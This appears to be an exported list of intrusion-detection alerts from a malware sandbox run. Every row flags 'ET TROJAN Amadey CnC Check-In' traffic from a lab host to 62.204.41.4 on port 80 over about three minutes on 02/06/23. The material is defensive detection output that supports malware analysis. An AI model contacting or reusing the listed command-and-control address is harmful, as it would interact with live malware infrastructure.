                                                                      192.168.2.762.204.41.450298802027700 02/06/23-18:38:32.460707TCP2027700ET TROJAN Amadey CnC Check-In5029880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450326802027700 02/06/23-18:38:39.035983TCP2027700ET TROJAN Amadey CnC Check-In5032680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449768802027700 02/06/23-18:36:08.295559TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449875802027700 02/06/23-18:36:36.759662TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450142802027700 02/06/23-18:37:51.625961TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450320802027700 02/06/23-18:38:37.801532TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449786802027700 02/06/23-18:36:12.426489TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450231802027700 02/06/23-18:38:14.609316TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450308802027700 02/06/23-18:38:34.900026TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450160802027700 02/06/23-18:37:55.923634TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449992802027700 02/06/23-18:37:10.200128TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450053802027700 02/06/23-18:37:27.528345TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449829802027700 02/06/23-18:36:24.582432TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450219802027700 02/06/23-18:38:11.691917TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450071802027700 02/06/23-18:37:33.042572TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449918802027700 02/06/23-18:36:50.149978TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449930802027700 02/06/23-18:36:55.312009TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450059802027700 02/06/23-18:37:28.737026TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450237802027700 02/06/23-18:38:16.048099TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449841802027700 02/06/23-18:36:27.522197TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450148802027700 02/06/23-18:37:53.070956TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450025802027700 02/06/23-18:37:20.761388TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449974802027700 02/06/23-18:37:05.733543TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450310802027700 02/06/23-18:38:35.397050TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450221802027700 02/06/23-18:38:12.187048TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449885802027700 02/06/23-18:36:39.224150TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450203802027700 02/06/23-18:38:06.492874TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449796802027700 02/06/23-18:36:14.772959TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450114802027700 02/06/23-18:37:43.360834TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450091802027700 02/06/23-18:37:37.888527TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450043802027700 02/06/23-18:37:25.122543TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449946802027700 02/06/23-18:36:58.902146TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450132802027700 02/06/23-18:37:47.847648TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449857802027700 02/06/23-18:36:31.085635TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450002802027700 02/06/23-18:37:14.985690TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450209802027700 02/06/23-18:38:09.315255TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449987802027700 02/06/23-18:37:08.994236TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450104802027700 02/06/23-18:37:40.952667TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450101802027700 02/06/23-18:37:40.235234TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449831802027700 02/06/23-18:36:25.110774TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449834802027700 02/06/23-18:36:25.833187TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450012802027700 02/06/23-18:37:17.535420TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450015802027700 02/06/23-18:37:18.281532TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450364802027700 02/06/23-18:38:50.253164TCP2027700ET TROJAN Amadey CnC Check-In5036480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449923802027700 02/06/23-18:36:51.342928TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449742802027700 02/06/23-18:36:01.986509TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450272802027700 02/06/23-18:38:24.734925TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450349802027700 02/06/23-18:38:46.552442TCP2027700ET TROJAN Amadey CnC Check-In5034980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450361802027700 02/06/23-18:38:49.540296TCP2027700ET TROJAN Amadey CnC Check-In5036180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449745802027700 02/06/23-18:36:02.707219TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450094802027700 02/06/23-18:37:38.590484TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450097802027700 02/06/23-18:37:39.294548TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450186802027700 02/06/23-18:38:02.145296TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450183802027700 02/06/23-18:38:01.423474TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449803802027700 02/06/23-18:36:18.277310TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449770802027700 02/06/23-18:36:08.800628TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450275802027700 02/06/23-18:38:26.060580TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449758802027700 02/06/23-18:36:05.847456TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449977802027700 02/06/23-18:37:06.464355TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450028802027700 02/06/23-18:37:21.493237TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450158802027700 02/06/23-18:37:55.451859TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450117802027700 02/06/23-18:37:44.099592TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450336802027700 02/06/23-18:38:41.486984TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450288802027700 02/06/23-18:38:30.033697TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450247802027700 02/06/23-18:38:18.501382TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450206802027700 02/06/23-18:38:07.828165TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449936802027700 02/06/23-18:36:56.541076TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449806802027700 02/06/23-18:36:19.040858TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449847802027700 02/06/23-18:36:28.712473TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449888802027700 02/06/23-18:36:39.931255TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449799802027700 02/06/23-18:36:15.767938TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450170802027700 02/06/23-18:37:58.303705TCP2027700ET TROJAN Amadey CnC Check-In5017080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449819802027700 02/06/23-18:36:22.168382TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449908802027700 02/06/23-18:36:47.759181TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450040802027700 02/06/23-18:37:24.355270TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449949802027700 02/06/23-18:36:59.621008TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450081802027700 02/06/23-18:37:35.445260TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449783802027700 02/06/23-18:36:11.707389TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450069802027700 02/06/23-18:37:32.561894TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449920802027700 02/06/23-18:36:50.617008TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450199802027700 02/06/23-18:38:05.327038TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450314802027700 02/06/23-18:38:36.369028TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450118802027700 02/06/23-18:37:44.342002TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450216802027700 02/06/23-18:38:10.984165TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449924802027700 02/06/23-18:36:51.587444TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450252802027700 02/06/23-18:38:19.689919TCP2027700ET TROJAN Amadey CnC Check-In5025280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449731802027700 02/06/23-18:35:58.287698TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449985802027700 02/06/23-18:37:08.510192TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450350802027700 02/06/23-18:38:46.836121TCP2027700ET TROJAN Amadey CnC Check-In5035080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450154802027700 02/06/23-18:37:54.498607TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449789802027700 02/06/23-18:36:13.130119TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449887802027700 02/06/23-18:36:39.694821TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450249802027700 02/06/23-18:38:18.972466TCP2027700ET TROJAN Amadey CnC Check-In5024980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450347802027700 02/06/23-18:38:46.051189TCP2027700ET TROJAN Amadey CnC Check-In5034780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450056802027700 02/06/23-18:37:28.014710TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449728802027700 02/06/23-18:35:57.036982TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449980802027700 02/06/23-18:37:07.211466TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449826802027700 02/06/23-18:36:23.882734TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449882802027700 02/06/23-18:36:38.444359TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449916802027700 02/06/23-18:36:49.663085TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450089802027700 02/06/23-18:37:37.423384TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450244802027700 02/06/23-18:38:17.760140TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449821802027700 02/06/23-18:36:22.668125TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449879802027700 02/06/23-18:36:37.726488TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449957802027700 02/06/23-18:37:01.557192TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450031802027700 02/06/23-18:37:22.219104TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449862802027700 02/06/23-18:36:32.276209TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450285802027700 02/06/23-18:38:29.330320TCP2027700ET TROJAN Amadey CnC Check-In5028580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450048802027700 02/06/23-18:37:26.342561TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449792802027700 02/06/23-18:36:13.832898TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450179802027700 02/06/23-18:38:00.453203TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450121802027700 02/06/23-18:37:45.046254TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450322802027700 02/06/23-18:38:38.036621TCP2027700ET TROJAN Amadey CnC Check-In5032280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450280802027700 02/06/23-18:38:28.132357TCP2027700ET TROJAN Amadey CnC Check-In5028080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450084802027700 02/06/23-18:37:36.184167TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450339802027700 02/06/23-18:38:42.208795TCP2027700ET TROJAN Amadey CnC Check-In5033980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449797802027700 02/06/23-18:36:15.167905TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450126802027700 02/06/23-18:37:46.263727TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449952802027700 02/06/23-18:37:00.344242TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449756802027700 02/06/23-18:36:05.379932TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449993802027700 02/06/23-18:37:10.446984TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449932802027700 02/06/23-18:36:55.578353TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449748802027700 02/06/23-18:36:03.424266TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449929802027700 02/06/23-18:36:54.008803TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450260802027700 02/06/23-18:38:21.613963TCP2027700ET TROJAN Amadey CnC Check-In5026080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450159802027700 02/06/23-18:37:55.686514TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449846802027700 02/06/23-18:36:28.476052TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450076802027700 02/06/23-18:37:34.245536TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450257802027700 02/06/23-18:38:20.892808TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450003802027700 02/06/23-18:37:15.250783TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450174802027700 02/06/23-18:37:59.284898TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450232802027700 02/06/23-18:38:14.844486TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450190802027700 02/06/23-18:38:03.117138TCP2027700ET TROJAN Amadey CnC Check-In5019080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449965802027700 02/06/23-18:37:03.533120TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450293802027700 02/06/23-18:38:31.205772TCP2027700ET TROJAN Amadey CnC Check-In5029380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450113802027700 02/06/23-18:37:43.122477TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450211802027700 02/06/23-18:38:09.797468TCP2027700ET TROJAN Amadey CnC Check-In5021180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450195802027700 02/06/23-18:38:04.351511TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449867802027700 02/06/23-18:36:33.500443TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449784802027700 02/06/23-18:36:11.941698TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449818802027700 02/06/23-18:36:21.931466TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449859802027700 02/06/23-18:36:31.553133TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450330802027700 02/06/23-18:38:40.019565TCP2027700ET TROJAN Amadey CnC Check-In5033080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449960802027700 02/06/23-18:37:02.273096TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450146802027700 02/06/23-18:37:52.585657TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450359802027700 02/06/23-18:38:49.036581TCP2027700ET TROJAN Amadey CnC Check-In5035980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450187802027700 02/06/23-18:38:02.390913TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450105802027700 02/06/23-18:37:41.185987TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450302802027700 02/06/23-18:38:33.426503TCP2027700ET TROJAN Amadey CnC Check-In5030280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449776802027700 02/06/23-18:36:10.243724TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450011802027700 02/06/23-18:37:17.285007TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450229802027700 02/06/23-18:38:14.131856TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449890802027700 02/06/23-18:36:40.402321TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450141802027700 02/06/23-18:37:51.394662TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449854802027700 02/06/23-18:36:30.381462TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450224802027700 02/06/23-18:38:12.894334TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450182802027700 02/06/23-18:38:01.180152TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449937802027700 02/06/23-18:36:56.780041TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450265802027700 02/06/23-18:38:22.792861TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449771802027700 02/06/23-18:36:09.033959TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449895802027700 02/06/23-18:36:41.619813TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449813802027700 02/06/23-18:36:20.733652TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449805802027700 02/06/23-18:36:18.799888TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450194802027700 02/06/23-18:38:04.099906TCP2027700ET TROJAN Amadey CnC Check-In5019480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450292802027700 02/06/23-18:38:30.970171TCP2027700ET TROJAN Amadey CnC Check-In5029280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449903802027700 02/06/23-18:36:43.538750TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450096802027700 02/06/23-18:37:39.062079TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449814802027700 02/06/23-18:36:20.972677TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450289802027700 02/06/23-18:38:30.269170TCP2027700ET TROJAN Amadey CnC Check-In5028980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450035802027700 02/06/23-18:37:23.185232TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450068802027700 02/06/23-18:37:32.325882TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450166802027700 02/06/23-18:37:57.344196TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449912802027700 02/06/23-18:36:48.704071TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449743802027700 02/06/23-18:36:02.235832TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450010802027700 02/06/23-18:37:17.037593TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450264802027700 02/06/23-18:38:22.550322TCP2027700ET TROJAN Amadey CnC Check-In5026480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450362802027700 02/06/23-18:38:49.786551TCP2027700ET TROJAN Amadey CnC Check-In5036280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449909802027700 02/06/23-18:36:47.991595TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450335802027700 02/06/23-18:38:41.243353TCP2027700ET TROJAN Amadey CnC Check-In5033580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449899802027700 02/06/23-18:36:42.575366TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449997802027700 02/06/23-18:37:12.438413TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450080802027700 02/06/23-18:37:35.199981TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449870802027700 02/06/23-18:36:34.488374TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450273802027700 02/06/23-18:38:25.058834TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450077802027700 02/06/23-18:37:34.482978TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449833802027700 02/06/23-18:36:25.603474TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450007802027700 02/06/23-18:37:16.259881TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449874802027700 02/06/23-18:36:36.510727TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450049802027700 02/06/23-18:37:26.579536TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450334802027700 02/06/23-18:38:41.003924TCP2027700ET TROJAN Amadey CnC Check-In5033480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450363802027700 02/06/23-18:38:50.019719TCP2027700ET TROJAN Amadey CnC Check-In5036380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449998802027700 02/06/23-18:37:12.834460TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.762.204.41.4
